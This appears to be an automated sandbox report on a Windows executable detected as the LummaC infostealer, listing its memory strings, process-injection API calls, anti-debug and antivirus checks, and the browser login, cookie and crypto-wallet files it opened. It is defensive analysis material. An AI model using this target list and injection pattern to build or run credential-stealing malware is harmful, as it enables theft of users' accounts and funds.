Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499129154.00000000032E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: SoftWare(1).exe1.exe, 00000001.00000003.1624223530.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602150925.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1554884834.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625328858.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: SoftWare(1).exe1.exe, 00000001.00000003.1624350076.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625195430.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1623865263.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 1_2_00449B30 LdrInitializeThunk,

1_2_00449B30

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 0_2_00336DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00336DE8

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 0_2_0035F1B4 mov edi, dword ptr fs:[00000030h]

0_2_0035F1B4

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 0_2_0034490C GetProcessHeap,

0_2_0034490C

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00336A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00336A2C
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00336DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00336DE8
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00336DDC SetUnhandledExceptionFilter,	0_2_00336DDC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0033EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0033EF1E
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00336A2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00336A2C
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00336DE8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00336DE8
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00336DDC SetUnhandledExceptionFilter,	1_2_00336DDC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0033EF1E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0033EF1E

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 0_2_0035F1B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_0035F1B4

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Memory written: C:\Users\user\Desktop\SoftWare(1).exe1.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Process created: C:\Users\user\Desktop\SoftWare(1).exe1.exe "C:\Users\user\Desktop\SoftWare(1).exe1.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: EnumSystemLocalesW,	0_2_003488AB
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,	0_2_003488F6
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0034899D
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: EnumSystemLocalesW,	0_2_003441F7
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00348238
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,	0_2_00348AA3
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: EnumSystemLocalesW,	0_2_00348489
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,	0_2_00343CFC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00348524
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: EnumSystemLocalesW,	0_2_00348777
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,	0_2_003487D6
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: EnumSystemLocalesW,	1_2_003488AB
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,	1_2_003488F6
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_0034899D
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: EnumSystemLocalesW,	1_2_003441F7
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00348238
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,	1_2_00348AA3
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: EnumSystemLocalesW,	1_2_00348489
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,	1_2_00343CFC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_00348524
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: EnumSystemLocalesW,	1_2_00348777
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: GetLocaleInfoW,	1_2_003487D6

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 0_2_00337827 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00337827

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580607406.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580093009.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: SoftWare(1).exe1.exe PID: 2340, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SoftWare(1).exe1.exe, 00000001.00000003.1624223530.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: SoftWare(1).exe1.exe, 00000001.00000003.1624223530.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: SoftWare(1).exe1.exe, 00000001.00000003.1623865263.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: SoftWare(1).exe1.exe, 00000001.00000003.1624223530.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: SoftWare(1).exe1.exe, 00000001.00000003.1554884834.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: SoftWare(1).exe1.exe, 00000001.00000003.1554842772.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: SoftWare(1).exe1.exe, 00000001.00000003.1624223530.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
